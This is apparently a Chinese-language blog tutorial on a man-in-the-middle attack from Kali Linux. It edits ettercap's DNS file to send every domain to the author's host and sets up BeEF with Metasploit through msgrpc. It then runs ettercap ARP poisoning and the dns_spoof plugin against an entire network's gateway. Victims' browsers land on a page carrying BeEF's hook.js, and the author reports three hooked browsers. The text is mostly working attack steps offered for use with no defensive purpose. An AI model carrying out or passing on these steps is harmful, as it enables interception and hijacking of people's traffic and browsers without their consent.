先更改首先先打開ettercap的DNS文件進行編輯,在kali linux2.0下的文件路徑為/etc/ettercap/etter.dns
在對應的位置添加對應的 標識和IP地址 * 代表所有域名 后邊就是你要欺騙為的IP地址,這里是當然是我自己的主機IP地址啦 然后記得保存。

然后vim /usr/share/beef-xss/config.yaml
將
metasploit:
enable: false改為true
然后vim /usr/share/beef-xss/extensions/demos/config.yaml
將
enable:true改為false
然后vim /usr/share/beef-xss/extensions/metasploit/config.yaml
將
設置
ssl: true
ssl_version: 'TLSv1'
如果你需要在你的beef中用的metasploit功能那么請執行以下命令(可選)
第一步:service postgresql start 第二步:msfconsole 第三步:load msgrpc ServerHost=127.0.0.1 User=msf Pass=abc123 SSL=y
運行BeEF
第一步:cd /usr/share/beef-xss/ 第二步: ./beef

運行完beef后會得到一個后台和js
beef后台usernmae:beef
password:beef
自己寫一個html將js放入html
將127.0.0.1:3000/hook.js設置為自己的ip.js
只要別人點擊了你的html就會被beef勾住
這是我寫的html

演示html:

首先運行ettercap的GUI
ettercap -G

Sniff-->Unified sniffing

根據自己的需求選擇對應的網卡

單機確定
點擊hosts--》scan for hosts掃描存活的IP

hosts-》Hosts list查看

將網關和目標IP添加

選中目標網關單機add to targent 2
目標add to targent 2
我是劫持整個網絡所以兩次都選擇網關
然后選擇mitm>arp poisoning

然后選擇第一個勾上 確定

配置插件plugins>mangge the plugins
我們要進行的是DNS欺騙 雙擊dns_spoof 可以看見下邊的提示

最后點擊strat>start sniffing開始DNS欺騙

然后進入beef后台坐等他人點擊瀏覽器,已上勾3台

受害者角度:

